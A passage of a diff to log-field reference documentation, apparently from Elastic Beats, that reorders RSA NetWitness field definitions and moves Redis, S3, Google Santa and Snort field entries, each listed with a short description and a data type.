seen at least once -type: keyword +type: long -- -*`rsa.counters.dclass_c2_str`*:: +*`rsa.internal.word`*:: + -- -This is a generic counter string key that should be used with the label dclass.c2 only +This is used by the Word Parsing technology to capture the first 5 character of every word in an unparsed log type: keyword -- -*`rsa.counters.dclass_r1_str`*:: + +*`rsa.time.event_time`*:: + -- -This is a generic ratio string key that should be used with the label dclass.r1 only +This key is used to capture the time mentioned in a raw session that represents the actual time an event occured in a standard normalized form -type: keyword +type: date -- -*`rsa.counters.dclass_r2`*:: +*`rsa.time.duration_time`*:: + -- -This is a generic ratio key that should be used with the label dclass.r2.str only +This key is used to capture the normalized duration/lifetime in seconds. -type: keyword +type: double -- -*`rsa.counters.dclass_c3_str`*:: +*`rsa.time.event_time_str`*:: + -- -This is a generic counter string key that should be used with the label dclass.c3 only +This key is used to capture the incomplete time mentioned in a session as a string type: keyword -- -*`rsa.counters.dclass_r3`*:: +*`rsa.time.starttime`*:: + -- -This is a generic ratio key that should be used with the label dclass.r3.str only +This key is used to capture the Start time mentioned in a session in a standard form -type: keyword +type: date -- -*`rsa.counters.dclass_r2_str`*:: +*`rsa.time.month`*:: + -- -This is a generic ratio string key that should be used with the label dclass.r2 only - type: keyword -- -*`rsa.counters.dclass_r3_str`*:: +*`rsa.time.day`*:: + -- -This is a generic ratio string key that should be used with the label dclass.r3 only - type: keyword -- - -*`rsa.identity.auth_method`*:: +*`rsa.time.endtime`*:: + -- -This key is used to capture authentication methods used only +This key is used to capture the End time mentioned in a session in a standard form -type: keyword +type: date -- -*`rsa.identity.user_role`*:: +*`rsa.time.timezone`*:: + -- -This key is used to capture the Role of a user only +This key is used to capture the timezone of the Event Time type: keyword -- -*`rsa.identity.dn`*:: +*`rsa.time.duration_str`*:: + -- -X.500 (LDAP) Distinguished Name +A text string version of the duration type: keyword -- -*`rsa.identity.logon_type`*:: +*`rsa.time.date`*:: + -- -This key is used to capture the type of logon method used. - type: keyword -- -*`rsa.identity.profile`*:: +*`rsa.time.year`*:: + -- -This key is used to capture the user profile - type: keyword -- -*`rsa.identity.accesses`*:: +*`rsa.time.recorded_time`*:: + -- -This key is used to capture actual privileges used in accessing an object +The event time as recorded by the system the event is collected from. The usage scenario is a multi-tier application where the management layer of the system records it's own timestamp at the time of collection from its child nodes. Must be in timestamp format. -type: keyword +type: date -- -*`rsa.identity.realm`*:: +*`rsa.time.datetime`*:: + -- -Radius realm or similar grouping of accounts - type: keyword -- -*`rsa.identity.user_sid_dst`*:: +*`rsa.time.effective_time`*:: + -- -This key captures Destination User Session ID +This key is the effective time referenced by an individual event in a Standard Timestamp format -type: keyword +type: date -- -*`rsa.identity.dn_src`*:: +*`rsa.time.expire_time`*:: + -- -An X.500 (LDAP) Distinguished name that is used in a context that indicates a Source dn +This key is the timestamp that explicitly refers to an expiration. -type: keyword +type: date -- -*`rsa.identity.org`*:: +*`rsa.time.process_time`*:: + -- -This key captures the User organization +Deprecated, use duration.time type: keyword -- -*`rsa.identity.dn_dst`*:: +*`rsa.time.hour`*:: + -- -An X.500 (LDAP) Distinguished name that used in a context that indicates a Destination dn - type: keyword -- -*`rsa.identity.firstname`*:: +*`rsa.time.min`*:: + -- -This key is for First Names only, this is used for Healthcare predominantly to capture Patients information - type: keyword -- -*`rsa.identity.lastname`*:: +*`rsa.time.timestamp`*:: + -- -This key is for Last Names only, this is used for Healthcare predominantly to capture Patients information - type: keyword -- -*`rsa.identity.user_dept`*:: +*`rsa.time.event_queue_time`*:: + -- -User's Department Names only +This key is the Time that the event was queued. -type: keyword +type: date -- -*`rsa.identity.user_sid_src`*:: +*`rsa.time.p_time1`*:: + -- -This key captures Source User Session ID - type: keyword -- -*`rsa.identity.federated_sp`*:: +*`rsa.time.tzone`*:: + -- -This key is the Federated Service Provider. This is the application requesting authentication. - type: keyword -- -*`rsa.identity.federated_idp`*:: +*`rsa.time.eventtime`*:: + -- -This key is the federated Identity Provider. This is the server providing the authentication. - type: keyword -- -*`rsa.identity.logon_type_desc`*:: +*`rsa.time.gmtdate`*:: + -- -This key is used to capture the textual description of an integer logon type as stored in the meta key 'logon.type'. - type: keyword -- -*`rsa.identity.middlename`*:: +*`rsa.time.gmttime`*:: + -- -This key is for Middle Names only, this is used for Healthcare predominantly to capture Patients information - type: keyword -- -*`rsa.identity.password`*:: +*`rsa.time.p_date`*:: + -- -This key is for Passwords seen in any session, plain text or encrypted - type: keyword -- -*`rsa.identity.host_role`*:: +*`rsa.time.p_month`*:: + -- -This key should only be used to capture the role of a Host Machine - type: keyword -- -*`rsa.identity.ldap`*:: +*`rsa.time.p_time`*:: + -- -This key is for Uninterpreted LDAP values. Ldap Values that don’t have a clear query or response context - type: keyword -- -*`rsa.identity.ldap_query`*:: +*`rsa.time.p_time2`*:: + -- -This key is the Search criteria from an LDAP search - type: keyword -- -*`rsa.identity.ldap_response`*:: +*`rsa.time.p_year`*:: + -- -This key is to capture Results from an LDAP search - type: keyword -- -*`rsa.identity.owner`*:: +*`rsa.time.expire_time_str`*:: + -- -This is used to capture username the process or service is running as, the author of the task +This key is used to capture incomplete timestamp that explicitly refers to an expiration. type: keyword -- -*`rsa.identity.service_account`*:: +*`rsa.time.stamp`*:: + -- -This key is a windows specific key, used for capturing name of the account a service (referenced in the event) is running under. Legacy Usage +Deprecated key defined only in table map. -type: keyword +type: date -- -*`rsa.email.email_dst`*:: +*`rsa.misc.action`*:: + -- -This key is used to capture the Destination email address only, when the destination context is not clear use email - type: keyword -- -*`rsa.email.email_src`*:: +*`rsa.misc.result`*:: + -- -This key is used to capture the source email address only, when the source context is not clear use email +This key is used to capture the outcome/result string value of an action in a session. type: keyword -- -*`rsa.email.subject`*:: +*`rsa.misc.severity`*:: + -- -This key is used to capture the subject string from an Email only. +This key is used to capture the severity given the session type: keyword -- -*`rsa.email.email`*:: +*`rsa.misc.event_type`*:: + -- -This key is used to capture a generic email address where the source or destination context is not clear +This key captures the event category type as specified by the event source. type: keyword -- -*`rsa.email.trans_from`*:: +*`rsa.misc.reference_id`*:: + -- -Deprecated key defined only in table map. +This key is used to capture an event id from the session directly type: keyword -- -*`rsa.email.trans_to`*:: +*`rsa.misc.version`*:: + -- -Deprecated key defined only in table map. +This key captures Version of the application or OS which is generating the event. type: keyword -- - -*`rsa.file.privilege`*:: +*`rsa.misc.disposition`*:: + -- -Deprecated, use permissions +This key captures the The end state of an action. type: keyword -- -*`rsa.file.attachment`*:: +*`rsa.misc.result_code`*:: + -- -This key captures the attachment file name +This key is used to capture the outcome/result numeric value of an action in a session type: keyword -- -*`rsa.file.filesystem`*:: +*`rsa.misc.category`*:: + -- +This key is used to capture the category of an event given by the vendor in the session + type: keyword -- -*`rsa.file.binary`*:: +*`rsa.misc.obj_name`*:: + -- -Deprecated key defined only in table map. +This is used to capture name of object type: keyword -- -*`rsa.file.filename_dst`*:: +*`rsa.misc.obj_type`*:: + -- -This is used to capture name of the file targeted by the action +This is used to capture type of object type: keyword -- -*`rsa.file.filename_src`*:: +*`rsa.misc.event_source`*:: + -- -This is used to capture name of the parent filename, the file which performed the action +This key captures Source of the event that’s not a hostname type: keyword -- -*`rsa.file.filename_tmp`*:: +*`rsa.misc.log_session_id`*:: + -- +This key is used to capture a sessionid from the session directly + type: keyword -- -*`rsa.file.directory_dst`*:: +*`rsa.misc.group`*:: + -- -This key is used to capture the directory of the target process or file +This key captures the Group Name value type: keyword -- -*`rsa.file.directory_src`*:: +*`rsa.misc.policy_name`*:: + -- -This key is used to capture the directory of the source process or file +This key is used to capture the Policy Name only. type: keyword -- -*`rsa.file.file_entropy`*:: +*`rsa.misc.rule_name`*:: + -- -This is used to capture entropy vale of a file +This key captures the Rule Name -type: double +type: keyword -- -*`rsa.file.file_vendor`*:: +*`rsa.misc.context`*:: + -- -This is used to capture Company name of file located in version_info +This key captures Information which adds additional context to the event. type: keyword -- -*`rsa.file.task_name`*:: +*`rsa.misc.change_new`*:: + -- -This is used to capture name of the task +This key is used to capture the new values of the attribute that’s changing in a session type: keyword -- - -*`rsa.web.fqdn`*:: +*`rsa.misc.space`*:: + -- -Fully Qualified Domain Names - type: keyword -- -*`rsa.web.web_cookie`*:: +*`rsa.misc.client`*:: + -- -This key is used to capture the Web cookies specifically. +This key is used to capture only the name of the client application requesting resources of the server. See the user.agent meta key for capture of the specific user agent identifier or browser identification string. type: keyword -- -*`rsa.web.alias_host`*:: +*`rsa.misc.msgIdPart1`*:: + -- type: keyword -- -*`rsa.web.reputation_num`*:: +*`rsa.misc.msgIdPart2`*:: + -- -Reputation Number of an entity. Typically used for Web Domains - -type: double +type: keyword -- -*`rsa.web.web_ref_domain`*:: +*`rsa.misc.change_old`*:: + -- -Web referer's domain +This key is used to capture the old value of the attribute that’s changing in a session type: keyword -- -*`rsa.web.web_ref_query`*:: +*`rsa.misc.operation_id`*:: + -- -This key captures Web referer's query portion of the URL +An alert number or operation number. The values should be unique and non-repeating. type: keyword -- -*`rsa.web.remote_domain`*:: +*`rsa.misc.event_state`*:: + -- +This key captures the current state of the object/item referenced within the event. Describing an on-going event. + type: keyword -- -*`rsa.web.web_ref_page`*:: +*`rsa.misc.group_object`*:: + -- -This key captures Web referer's page information +This key captures a collection/grouping of entities. Specific usage type: keyword -- -*`rsa.web.web_ref_root`*:: +*`rsa.misc.node`*:: + -- -Web referer's root URL path +Common use case is the node name within a cluster. The cluster name is reflected by the host name. type: keyword -- -*`rsa.web.cn_asn_dst`*:: +*`rsa.misc.rule`*:: + -- +This key captures the Rule number + type: keyword -- -*`rsa.web.cn_rpackets`*:: +*`rsa.misc.device_name`*:: + -- +This is used to capture name of the Device associated with the node Like: a physical disk, printer, etc + type: keyword -- -*`rsa.web.urlpage`*:: +*`rsa.misc.param`*:: + -- +This key is the parameters passed as part of a command or application, etc. + type: keyword -- -*`rsa.web.urlroot`*:: +*`rsa.misc.change_attrib`*:: + -- +This key is used to capture the name of the attribute that’s changing in a session + type: keyword -- -*`rsa.web.p_url`*:: +*`rsa.misc.event_computer`*:: + -- +This key is a windows only concept, where this key is used to capture fully qualified domain name in a windows log. + type: keyword -- -*`rsa.web.p_user_agent`*:: +*`rsa.misc.reference_id1`*:: + -- +This key is for Linked ID to be used as an addition to "reference.id" + type: keyword -- -*`rsa.web.p_web_cookie`*:: +*`rsa.misc.event_log`*:: + -- +This key captures the Name of the event log + type: keyword -- -*`rsa.web.p_web_method`*:: +*`rsa.misc.OS`*:: + -- +This key captures the Name of the Operating System + type: keyword -- -*`rsa.web.p_web_referer`*:: +*`rsa.misc.terminal`*:: + -- +This key captures the Terminal Names only + type: keyword -- -*`rsa.web.web_extension_tmp`*:: +*`rsa.misc.msgIdPart3`*:: + -- type: keyword -- -*`rsa.web.web_page`*:: +*`rsa.misc.filter`*:: + -- +This key captures Filter used to reduce result set + type: keyword -- - -*`rsa.threat.threat_category`*:: +*`rsa.misc.serial_number`*:: + -- -This key captures Threat Name/Threat Category/Categorization of alert +This key is the Serial number associated with a physical asset. type: keyword -- -*`rsa.threat.threat_desc`*:: +*`rsa.misc.checksum`*:: + -- -This key is used to capture the threat description from the session directly or inferred +This key is used to capture the checksum or hash of the entity such as a file or process. Checksum should be used over checksum.src or checksum.dst when it is unclear whether the entity is a source or target of an action. type: keyword -- -*`rsa.threat.alert`*:: +*`rsa.misc.event_user`*:: + -- -This key is used to capture name of the alert +This key is a windows only concept, where this key is used to capture combination of domain name and username in a windows log. type: keyword -- -*`rsa.threat.threat_source`*:: +*`rsa.misc.virusname`*:: + -- -This key is used to capture source of the threat +This key captures the name of the virus type: keyword -- - -*`rsa.crypto.crypto`*:: +*`rsa.misc.content_type`*:: + -- -This key is used to capture the Encryption Type or Encryption Key only +This key is used to capture Content Type only. type: keyword -- -*`rsa.crypto.cipher_src`*:: +*`rsa.misc.group_id`*:: + -- -This key is for Source (Client) Cipher +This key captures Group ID Number (related to the group name) type: keyword -- -*`rsa.crypto.cert_subject`*:: +*`rsa.misc.policy_id`*:: + -- -This key is used to capture the Certificate organization only +This key is used to capture the Policy ID only, this should be a numeric value, use policy.name otherwise type: keyword -- -*`rsa.crypto.peer`*:: +*`rsa.misc.vsys`*:: + -- -This key is for Encryption peer's IP Address +This key captures Virtual System Name type: keyword -- -*`rsa.crypto.cipher_size_src`*:: +*`rsa.misc.connection_id`*:: + -- -This key captures Source (Client) Cipher Size +This key captures the Connection ID -type: long +type: keyword -- -*`rsa.crypto.ike`*:: +*`rsa.misc.reference_id2`*:: + -- -IKE negotiation phase. +This key is for the 2nd Linked ID. Can be either linked to "reference.id" or "reference.id1" value but should not be used unless the other two variables are in play. type: keyword -- -*`rsa.crypto.scheme`*:: +*`rsa.misc.sensor`*:: + -- -This key captures the Encryption scheme used +This key captures Name of the sensor. Typically used in IDS/IPS based devices type: keyword -- -*`rsa.crypto.peer_id`*:: +*`rsa.misc.sig_id`*:: + -- -This key is for Encryption peer’s identity +This key captures IDS/IPS Int Signature ID -type: keyword +type: long -- -*`rsa.crypto.sig_type`*:: +*`rsa.misc.port_name`*:: + -- -This key captures the Signature Type +This key is used for Physical or logical port connection but does NOT include a network port. (Example: Printer port name). type: keyword -- -*`rsa.crypto.cert_issuer`*:: +*`rsa.misc.rule_group`*:: + -- +This key captures the Rule group name + type: keyword -- -*`rsa.crypto.cert_host_name`*:: +*`rsa.misc.risk_num`*:: + -- -Deprecated key defined only in table map. +This key captures a Numeric Risk value -type: keyword +type: double -- -*`rsa.crypto.cert_error`*:: +*`rsa.misc.trigger_val`*:: + -- -This key captures the Certificate Error String +This key captures the Value of the trigger or threshold condition. type: keyword -- -*`rsa.crypto.cipher_dst`*:: +*`rsa.misc.log_session_id1`*:: + -- -This key is for Destination (Server) Cipher +This key is used to capture a Linked (Related) Session ID from the session directly type: keyword -- -*`rsa.crypto.cipher_size_dst`*:: +*`rsa.misc.comp_version`*:: + -- -This key captures Destination (Server) Cipher Size +This key captures the Version level of a sub-component of a product. -type: long +type: keyword -- -*`rsa.crypto.ssl_ver_src`*:: +*`rsa.misc.content_version`*:: + -- -Deprecated, use version +This key captures Version level of a signature or database content. type: keyword -- -*`rsa.crypto.d_certauth`*:: +*`rsa.misc.hardware_id`*:: + -- +This key is used to capture unique identifier for a device or system (NOT a Mac address) + type: keyword -- -*`rsa.crypto.s_certauth`*:: +*`rsa.misc.risk`*:: + -- +This key captures the non-numeric risk value + type: keyword -- -*`rsa.crypto.ike_cookie1`*:: +*`rsa.misc.event_id`*:: + -- -ID of the negotiation — sent for ISAKMP Phase One - type: keyword -- -*`rsa.crypto.ike_cookie2`*:: +*`rsa.misc.reason`*:: + -- -ID of the negotiation — sent for ISAKMP Phase Two - type: keyword -- -*`rsa.crypto.cert_checksum`*:: +*`rsa.misc.status`*:: + -- type: keyword -- -*`rsa.crypto.cert_host_cat`*:: +*`rsa.misc.mail_id`*:: + -- -This key is used for the hostname category value of a certificate +This key is used to capture the mailbox id/name type: keyword -- -*`rsa.crypto.cert_serial`*:: +*`rsa.misc.rule_uid`*:: + -- -This key is used to capture the Certificate serial number only +This key is the Unique Identifier for a rule. type: keyword -- -*`rsa.crypto.cert_status`*:: +*`rsa.misc.trigger_desc`*:: + -- -This key captures Certificate validation status +This key captures the Description of the trigger or threshold condition. type: keyword -- -*`rsa.crypto.ssl_ver_dst`*:: +*`rsa.misc.inout`*:: + -- -Deprecated, use version +type: keyword + +-- +*`rsa.misc.p_msgid`*:: ++ +-- type: keyword -- -*`rsa.crypto.cert_keysize`*:: +*`rsa.misc.data_type`*:: + -- type: keyword -- -*`rsa.crypto.cert_username`*:: +*`rsa.misc.msgIdPart4`*:: + -- type: keyword -- -*`rsa.crypto.https_insact`*:: +*`rsa.misc.error`*:: + -- +This key captures All non successful Error codes or responses + type: keyword -- -*`rsa.crypto.https_valid`*:: +*`rsa.misc.index`*:: + -- type: keyword -- -*`rsa.crypto.cert_ca`*:: +*`rsa.misc.listnum`*:: + -- -This key is used to capture the Certificate signing authority only +This key is used to capture listname or listnumber, primarily for collecting access-list type: keyword -- -*`rsa.crypto.cert_common`*:: +*`rsa.misc.ntype`*:: + -- -This key is used to capture the Certificate common name only - type: keyword -- - -*`rsa.wireless.wlan_ssid`*:: +*`rsa.misc.observed_val`*:: + -- -This key is used to capture the ssid of a Wireless Session +This key captures the Value observed (from the perspective of the device generating the log). type: keyword -- -*`rsa.wireless.access_point`*:: +*`rsa.misc.policy_value`*:: + -- -This key is used to capture the access point name. +This key captures the contents of the policy. This contains details about the policy type: keyword -- -*`rsa.wireless.wlan_channel`*:: +*`rsa.misc.pool_name`*:: + -- -This is used to capture the channel names +This key captures the name of a resource pool -type: long +type: keyword -- -*`rsa.wireless.wlan_name`*:: +*`rsa.misc.rule_template`*:: + -- -This key captures either WLAN number/name +A default set of parameters which are overlayed onto a rule (or rulename) which efffectively constitutes a template type: keyword -- - -*`rsa.storage.disk_volume`*:: +*`rsa.misc.count`*:: + -- -A unique name assigned to logical units (volumes) within a physical disk - type: keyword -- -*`rsa.storage.lun`*:: +*`rsa.misc.number`*:: + -- -Logical Unit Number.This key is a very useful concept in Storage. - type: keyword -- -*`rsa.storage.pwwn`*:: +*`rsa.misc.sigcat`*:: + -- -This uniquely identifies a port on a HBA. - type: keyword -- - -*`rsa.physical.org_dst`*:: +*`rsa.misc.type`*:: + -- -This is used to capture the destination organization based on the GEOPIP Maxmind database. - type: keyword -- -*`rsa.physical.org_src`*:: +*`rsa.misc.comments`*:: + -- -This is used to capture the source organization based on the GEOPIP Maxmind database. +Comment information provided in the log message type: keyword -- - -*`rsa.healthcare.patient_fname`*:: +*`rsa.misc.doc_number`*:: + -- -This key is for First Names only, this is used for Healthcare predominantly to capture Patients information +This key captures File Identification number -type: keyword +type: long -- -*`rsa.healthcare.patient_id`*:: +*`rsa.misc.expected_val`*:: + -- -This key captures the unique ID for a patient +This key captures the Value expected (from the perspective of the device generating the log). type: keyword -- -*`rsa.healthcare.patient_lname`*:: +*`rsa.misc.job_num`*:: + -- -This key is for Last Names only, this is used for Healthcare predominantly to capture Patients information +This key captures the Job Number type: keyword -- -*`rsa.healthcare.patient_mname`*:: +*`rsa.misc.spi_dst`*:: + -- -This key is for Middle Names only, this is used for Healthcare predominantly to capture Patients information +Destination SPI Index type: keyword -- - -*`rsa.endpoint.host_state`*:: +*`rsa.misc.spi_src`*:: + -- -This key is used to capture the current state of the machine, such as blacklisted, infected, firewall disabled and so on +Source SPI Index type: keyword -- -*`rsa.endpoint.registry_key`*:: +*`rsa.misc.code`*:: + -- -This key captures the path to the registry key - type: keyword -- -*`rsa.endpoint.registry_value`*:: +*`rsa.misc.agent_id`*:: + -- -This key captures values or decorators used within a registry entry +This key is used to capture agent id type: keyword -- -[[exported-fields-redis]] -== Redis fields - -Redis Module - - - -[float] -=== redis - - - - -[float] -=== log - -Redis log files - - - -*`redis.log.role`*:: +*`rsa.misc.message_body`*:: + -- -The role of the Redis instance. Can be one of `master`, `slave`, `child` (for RDF/AOF writing child), or `sentinel`. - +This key captures the The contents of the message body. type: keyword -- -*`redis.log.pid`*:: +*`rsa.misc.phone`*:: + -- -type: alias - -alias to: process.pid +type: keyword -- -*`redis.log.level`*:: +*`rsa.misc.sig_id_str`*:: + -- -type: alias +This key captures a string object of the sigid variable. -alias to: log.level +type: keyword -- -*`redis.log.message`*:: +*`rsa.misc.cmd`*:: + -- -type: alias - -alias to: message +type: keyword -- -[float] -=== slowlog - -Slow logs are retrieved from Redis via a network connection. - - - -*`redis.slowlog.cmd`*:: +*`rsa.misc.misc`*:: + -- -The command executed. - - type: keyword -- -*`redis.slowlog.duration.us`*:: +*`rsa.misc.name`*:: + -- -How long it took to execute the command in microseconds. - - -type: long +type: keyword -- -*`redis.slowlog.id`*:: +*`rsa.misc.cpu`*:: + -- -The ID of the query. - +This key is the CPU time used in the execution of the event being recorded. type: long -- -*`redis.slowlog.key`*:: +*`rsa.misc.event_desc`*:: + -- -The key on which the command was executed. - +This key is used to capture a description of an event available directly or inferred type: keyword -- -*`redis.slowlog.args`*:: +*`rsa.misc.sig_id1`*:: + -- -The arguments with which the command was called. - +This key captures IDS/IPS Int Signature ID. This must be linked to the sig.id -type: keyword +type: long -- -[[exported-fields-s3]] -== s3 fields - -S3 fields from s3 input. - - - -*`bucket_name`*:: +*`rsa.misc.im_buddyid`*:: + -- -Name of the S3 bucket that this log retrieved from. - - type: keyword -- -*`object_key`*:: +*`rsa.misc.im_client`*:: + -- -Name of the S3 object that this log retrieved from. - - type: keyword -- -[[exported-fields-santa]] -== Google Santa fields - -Santa Module - - - -[float] -=== santa - - - - -*`santa.action`*:: +*`rsa.misc.im_userid`*:: + -- -Action - type: keyword -example: EXEC - -- -*`santa.decision`*:: +*`rsa.misc.pid`*:: + -- -Decision that santad took. - type: keyword -example: ALLOW - -- -*`santa.reason`*:: +*`rsa.misc.priority`*:: + -- -Reason for the decsision. - type: keyword -example: CERT - -- -*`santa.mode`*:: +*`rsa.misc.context_subject`*:: + -- -Operating mode of Santa. +This key is to be used in an audit context where the subject is the object being identified type: keyword -example: M - -- -[float] -=== disk - -Fields for DISKAPPEAR actions. - - -*`santa.disk.volume`*:: +*`rsa.misc.context_target`*:: + -- -The volume name. +type: keyword -- -*`santa.disk.bus`*:: +*`rsa.misc.cve`*:: + -- -The disk bus protocol. +This key captures CVE (Common Vulnerabilities and Exposures) - an identifier for known information security vulnerabilities. + +type: keyword -- -*`santa.disk.serial`*:: +*`rsa.misc.fcatnum`*:: + -- -The disk serial number. +This key captures Filter Category Number. Legacy Usage + +type: keyword -- -*`santa.disk.bsdname`*:: +*`rsa.misc.library`*:: + -- -The disk BSD name. +This key is used to capture library information in mainframe devices -example: disk1s3 +type: keyword -- -*`santa.disk.model`*:: +*`rsa.misc.parent_node`*:: + -- -The disk model. +This key captures the Parent Node Name. Must be related to node variable. -example: APPLE SSD SM0512L +type: keyword -- -*`santa.disk.fs`*:: +*`rsa.misc.risk_info`*:: + -- -The disk volume kind (filesystem type). +Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) -example: apfs +type: keyword -- -*`santa.disk.mount`*:: +*`rsa.misc.tcp_flags`*:: + -- -The disk volume path. +This key is captures the TCP flags set in any packet of session + +type: long -- -*`santa.certificate.common_name`*:: +*`rsa.misc.tos`*:: + -- -Common name from code signing certificate. +This key describes the type of service -type: keyword +type: long -- -*`santa.certificate.sha256`*:: +*`rsa.misc.vm_target`*:: + -- -SHA256 hash of code signing certificate. +VMWare Target **VMWARE** only varaible. type: keyword -- -[[exported-fields-snort]] -== Snort/Sourcefire fields - -snort fields. - - - -*`network.interface.name`*:: +*`rsa.misc.workspace`*:: + -- -Name of the network interface where the traffic has been observed. - +This key captures Workspace Description type: keyword -- +*`rsa.misc.command`*:: ++ +-- +type: keyword +-- -*`rsa.internal.msg`*:: +*`rsa.misc.event_category`*:: + -- -This key is used to capture the raw message that comes into the Log Decoder - type: keyword -- -*`rsa.internal.messageid`*:: +*`rsa.misc.facilityname`*:: + -- type: keyword -- -*`rsa.internal.event_desc`*:: +*`rsa.misc.forensic_info`*:: + -- type: keyword -- -*`rsa.internal.message`*:: +*`rsa.misc.jobname`*:: + -- -This key captures the contents of instant messages - type: keyword -- -*`rsa.internal.time`*:: +*`rsa.misc.mode`*:: + -- -This is the time at which a session hits a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. - -type: date +type: keyword -- -*`rsa.internal.level`*:: +*`rsa.misc.policy`*:: + -- -Deprecated key defined only in table map. - -type: long +type: keyword -- -*`rsa.internal.msg_id`*:: +*`rsa.misc.policy_waiver`*:: + -- -This is the Message ID1 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.msg_vid`*:: +*`rsa.misc.second`*:: + -- -This is the Message ID2 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.data`*:: +*`rsa.misc.space1`*:: + -- -Deprecated key defined only in table map. - type: keyword -- -*`rsa.internal.obj_server`*:: +*`rsa.misc.subcategory`*:: + -- -Deprecated key defined only in table map. - type: keyword -- -*`rsa.internal.obj_val`*:: +*`rsa.misc.tbdstr2`*:: + -- -Deprecated key defined only in table map. - type: keyword -- -*`rsa.internal.resource`*:: +*`rsa.misc.alert_id`*:: + -- -Deprecated key defined only in table map. +Deprecated, New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) type: keyword -- -*`rsa.internal.obj_id`*:: +*`rsa.misc.checksum_dst`*:: + -- -Deprecated key defined only in table map. +This key is used to capture the checksum or hash of the the target entity such as a process or file. type: keyword -- -*`rsa.internal.statement`*:: +*`rsa.misc.checksum_src`*:: + -- -Deprecated key defined only in table map. +This key is used to capture the checksum or hash of the source entity such as a file or process. type: keyword -- -*`rsa.internal.audit_class`*:: +*`rsa.misc.fresult`*:: + -- -Deprecated key defined only in table map. +This key captures the Filter Result -type: keyword +type: long -- -*`rsa.internal.entry`*:: +*`rsa.misc.payload_dst`*:: + -- -Deprecated key defined only in table map. +This key is used to capture destination payload type: keyword -- -*`rsa.internal.hcode`*:: +*`rsa.misc.payload_src`*:: + -- -Deprecated key defined only in table map. +This key is used to capture source payload type: keyword -- -*`rsa.internal.inode`*:: +*`rsa.misc.pool_id`*:: + -- -Deprecated key defined only in table map. +This key captures the identifier (typically numeric field) of a resource pool -type: long +type: keyword -- -*`rsa.internal.resource_class`*:: +*`rsa.misc.process_id_val`*:: + -- -Deprecated key defined only in table map. +This key is a failure key for Process ID when it is not an integer value type: keyword -- -*`rsa.internal.dead`*:: +*`rsa.misc.risk_num_comm`*:: + -- -Deprecated key defined only in table map. +This key captures Risk Number Community -type: long +type: double -- -*`rsa.internal.feed_desc`*:: +*`rsa.misc.risk_num_next`*:: + -- -This is used to capture the description of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +This key captures Risk Number NextGen -type: keyword +type: double -- -*`rsa.internal.feed_name`*:: +*`rsa.misc.risk_num_sand`*:: + -- -This is used to capture the name of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +This key captures Risk Number SandBox -type: keyword +type: double -- -*`rsa.internal.cid`*:: +*`rsa.misc.risk_num_static`*:: + -- -This is the unique identifier used to identify a NetWitness Concentrator. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +This key captures Risk Number Static -type: keyword +type: double -- -*`rsa.internal.device_class`*:: +*`rsa.misc.risk_suspicious`*:: + -- -This is the Classification of the Log Event Source under a predefined fixed set of Event Source Classifications. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) type: keyword -- -*`rsa.internal.device_group`*:: +*`rsa.misc.risk_warning`*:: + -- -This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) type: keyword -- -*`rsa.internal.device_host`*:: +*`rsa.misc.snmp_oid`*:: + -- -This is the Hostname of the log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +SNMP Object Identifier type: keyword -- -*`rsa.internal.device_ip`*:: +*`rsa.misc.sql`*:: + -- -This is the IPv4 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +This key captures the SQL query -type: ip +type: keyword -- -*`rsa.internal.device_ipv6`*:: +*`rsa.misc.vuln_ref`*:: + -- -This is the IPv6 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +This key captures the Vulnerability Reference details -type: ip +type: keyword -- -*`rsa.internal.device_type`*:: +*`rsa.misc.acl_id`*:: + -- -This is the name of the log parser which parsed a given session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.device_type_id`*:: +*`rsa.misc.acl_op`*:: + -- -Deprecated key defined only in table map. - -type: long +type: keyword -- -*`rsa.internal.did`*:: +*`rsa.misc.acl_pos`*:: + -- -This is the unique identifier used to identify a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.entropy_req`*:: +*`rsa.misc.acl_table`*:: + -- -This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration - -type: long +type: keyword -- -*`rsa.internal.entropy_res`*:: +*`rsa.misc.admin`*:: + -- -This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration - -type: long +type: keyword -- -*`rsa.internal.event_name`*:: +*`rsa.misc.alarm_id`*:: + -- -Deprecated key defined only in table map. - type: keyword -- -*`rsa.internal.feed_category`*:: +*`rsa.misc.alarmname`*:: + -- -This is used to capture the category of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.forward_ip`*:: +*`rsa.misc.app_id`*:: + -- -This key should be used to capture the IPV4 address of a relay system which forwarded the events from the original system to NetWitness. - -type: ip +type: keyword -- -*`rsa.internal.forward_ipv6`*:: +*`rsa.misc.audit`*:: + -- -This key is used to capture the IPV6 address of a relay system which forwarded the events from the original system to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: ip +type: keyword -- -*`rsa.internal.header_id`*:: 